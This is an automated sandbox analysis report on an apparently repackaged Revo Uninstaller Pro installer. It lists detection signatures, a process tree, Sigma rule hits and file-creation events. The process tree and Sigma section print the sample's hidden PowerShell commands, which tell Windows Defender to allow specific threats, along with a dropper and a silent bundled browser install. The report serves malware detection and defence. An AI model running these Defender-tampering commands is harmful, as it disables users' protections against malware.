Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Revo.Uninstaller.Pro.v5.3.4.exe

Overview

General Information

Sample name:Revo.Uninstaller.Pro.v5.3.4.exe
Analysis ID:1571786
MD5:881464f03502d44e29e5fea8b4c35538
SHA1:8d2337cd5d72f43415e1d8ffb352a85d3374dd1c
SHA256:2a789deb64dd90261f2833d4da0d9f617f2a37ce49ecfa085f5dd43725795a1f
Tags:exeuser-Bacn
Infos:

Detection

Score:44
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Loading BitLocker PowerShell Module
Possible COM Object hijacking
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Classes Autorun Keys Modification
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potentially Suspicious Rundll32 Activity
Sigma detected: Suspicious Rundll32 Setupapi.dll Activity
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • Revo.Uninstaller.Pro.v5.3.4.exe (PID: 7324 cmdline: "C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe" MD5: 881464F03502D44E29E5FEA8B4C35538)
    • rundll32.exe (PID: 7724 cmdline: RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf MD5: EF3179D498793BF4234F708D3BE28633)
      • runonce.exe (PID: 7784 cmdline: "C:\Windows\system32\runonce.exe" -r MD5: 9ADEF025B168447C1E8514D919CB5DC0)
        • grpconv.exe (PID: 7820 cmdline: "C:\Windows\System32\grpconv.exe" -o MD5: 8531882ACC33CB4BDC11B305A01581CE)
    • regsvr32.exe (PID: 7956 cmdline: regsvr32.exe /s "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
    • RevoUninPro.exe (PID: 8000 cmdline: "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe" /bc MD5: EE15BFE5A394ADBFB087B053A6A72821)
    • ruplp.exe (PID: 8048 cmdline: "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe" /regserver /NOREDIRECT MD5: 216B49B7EB7BE44D7ED7367F3725285F)
    • RevoUninPro.exe (PID: 8128 cmdline: "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe" MD5: EE15BFE5A394ADBFB087B053A6A72821)
    • cmd.exe (PID: 1620 cmdline: cmd.exe /c "C:\Users\user\AppData\Local\Temp\PACK.EXE" -p123 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PACK.EXE (PID: 3756 cmdline: C:\Users\user\AppData\Local\Temp\PACK.EXE -p123 MD5: A868E9C0A97C2EF80602C0F6634913F8)
        • powershell.exe (PID: 1260 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 1344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7620 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147735505 -ThreatIDDefaultAction_Actions Allow -Force" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1244 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147814523 -ThreatIDDefaultAction_Actions Allow -Force" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ya.exe (PID: 4420 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe" MD5: 7ACCFDE96C04320BA099144A7BE710CC)
          • OperaSetup.exe (PID: 7852 cmdline: "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0 MD5: 5A1105F1C25A60B128D45EC03041BF48)
            • setup.exe (PID: 8040 cmdline: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe --silent --allusers=0 --server-tracking-blob=NjAxODRkYTk2NmVjNjFhZDRjZmFkOGU5NDAyOGEwYWNlYzViZGE5ZjVkYTg0YmUwMzJiZDRjZWFjZGQ4ODM0Njp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cz91dG1fc291cmNlPURXTkxTVCZ1dG1fbWVkaXVtPWFwYiZ1dG1fY2FtcGFpZ249cjEwIiwidGltZXN0YW1wIjoiMTczMzc2MzI0Mi4yNjIyIiwidXNlcmFnZW50IjoiTlNJU19JbmV0YyAoTW96aWxsYSkiLCJ1dG0iOnsiY2FtcGFpZ24iOiJyMTAiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJEV05MU1QifSwidXVpZCI6ImNkOWY4MWM2LTcyOWEtNGQ5NS1hYzcxLTFlYmJhNzViZmM3YiJ9 MD5: F9DA76E8D7DB633AB031EE5AC59BB55E)
              • setup.exe (PID: 1640 cmdline: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x324,0x328,0x32c,0x300,0x330,0x6c2f7cf4,0x6c2f7d00,0x6c2f7d0c MD5: F9DA76E8D7DB633AB031EE5AC59BB55E)
              • setup.exe (PID: 2252 cmdline: "C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version MD5: F9DA76E8D7DB633AB031EE5AC59BB55E)
              • setup.exe (PID: 8068 cmdline: "C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --showunbox=0 --installfolder="C:\Users\user\AppData\Local\Programs\Opera" --profile-folder --language=en-GB --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=8040 --package-dir-prefix="C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20241209115409" --session-guid=57f4b7c1-1875-4c3d-aada-fe1e595f9b71 --server-tracking-blob="ZTEzMzE3M2U4ODhkN2Y3YmE0ODQ3NmYwNmNlNmJmMDE4NmY4MzAzYmNmNWRmMWYyYmVlYWJmNDExZjE1ZDAzODp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cz91dG1fc291cmNlPURXTkxTVCZ1dG1fbWVkaXVtPWFwYiZ1dG1fY2FtcGFpZ249cjEwIiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzMzNzYzMjQyLjI2MjIiLCJ1c2VyYWdlbnQiOiJOU0lTX0luZXRjIChNb3ppbGxhKSIsInV0bSI6eyJjYW1wYWlnbiI6InIxMCIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6IkRXTkxTVCJ9LCJ1dWlkIjoiY2Q5ZjgxYzYtNzI5YS00ZDk1LWFjNzEtMWViYmE3NWJmYzdiIn0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=1806000000000000 MD5: F9DA76E8D7DB633AB031EE5AC59BB55E)
                • setup.exe (PID: 8056 cmdline: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x31c,0x320,0x330,0x2f8,0x334,0x6b717cf4,0x6b717d00,0x6b717d0c MD5: F9DA76E8D7DB633AB031EE5AC59BB55E)
  • ruplp.exe (PID: 1188 cmdline: C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe -Embedding MD5: 216B49B7EB7BE44D7ED7367F3725285F)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000A.00000000.2096953602.0000000000401000.00000020.00000001.01000000.0000000F.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
    SourceRuleDescriptionAuthorStrings
    10.0.ruplp.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

      System Summary

      barindex
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force", CommandLine|base64offset|contains: z%, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\PACK.EXE -p123, ParentImage: C:\Users\user\AppData\Local\Temp\PACK.EXE, ParentProcessId: 3756, ParentProcessName: PACK.EXE, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force", ProcessId: 1260, ProcessName: powershell.exe
      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: {2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\regsvr32.exe, ProcessId: 7956, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\RUShellExt\(Default)
      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: grpconv -o, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\rundll32.exe, ProcessId: 7724, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\GrpConv
      Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems): Data: Command: RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf, CommandLine: RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf, CommandLine|base64offset|contains: [HZ, Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: "C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe", ParentImage: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe, ParentProcessId: 7324, ParentProcessName: Revo.Uninstaller.Pro.v5.3.4.exe, ProcessCommandLine: RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf, ProcessId: 7724, ProcessName: rundll32.exe
      Source: Process startedAuthor: Konstantin Grishchenko, oscd.community: Data: Command: "C:\Windows\system32\runonce.exe" -r, CommandLine: "C:\Windows\system32\runonce.exe" -r, CommandLine|base64offset|contains: , Image: C:\Windows\System32\runonce.exe, NewProcessName: C:\Windows\System32\runonce.exe, OriginalFileName: C:\Windows\System32\runonce.exe, ParentCommandLine: RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 7724, ParentProcessName: rundll32.exe, ProcessCommandLine: "C:\Windows\system32\runonce.exe" -r, ProcessId: 7784, ProcessName: runonce.exe
      Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe -Embedding, CommandLine: C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe, NewProcessName: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe, OriginalFileName: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 752, ProcessCommandLine: C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe -Embedding, ProcessId: 1188, ProcessName: ruplp.exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force", CommandLine|base64offset|contains: z%, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\PACK.EXE -p123, ParentImage: C:\Users\user\AppData\Local\Temp\PACK.EXE, ParentProcessId: 3756, ParentProcessName: PACK.EXE, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force", ProcessId: 1260, ProcessName: powershell.exe
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\tsjtmfdm[1].pkgReversingLabs: Detection: 29%
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXEReversingLabs: Detection: 29%
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeReversingLabs: Detection: 25%
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.5% probability
      Source: Revo.Uninstaller.Pro.v5.3.4.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo GroupJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller ProJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoAppBar.exeJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoCmd.exeJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUnPro.exeJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.infJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.sysJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\VistaJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Vista\revoflt.infJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Vista\revoflt.sysJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Win10Jump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Win10\revoflt.infJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Win10\revoflt.sysJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\License.txtJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Revo Uninstaller Pro Help.pdfJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\reg_lp.batJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\rupilogs.rupldbJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\langJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\Estonian.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\albanian.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\arabic.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\armenian.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\azerbaijani.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\bengali.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\bulgarian.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\czech.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\danish.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\dutch.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\english.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\finnish.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\french.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\german.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\gujarati.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\hebrew.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\hellenic.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\hindi.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\hrvatski.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\hungarian.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\indonesian.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\italiano.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\japanese.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\korean.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\kurdish.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\macedonian.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\norwegian.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\persian.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\polish.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\portuguese.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\portuguese_standard.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\portuguesebrazil.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\romanian.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\russian.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\serbian.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\serbianLatin.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\simplifiedchinese.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\slovak.iniJump to behavior
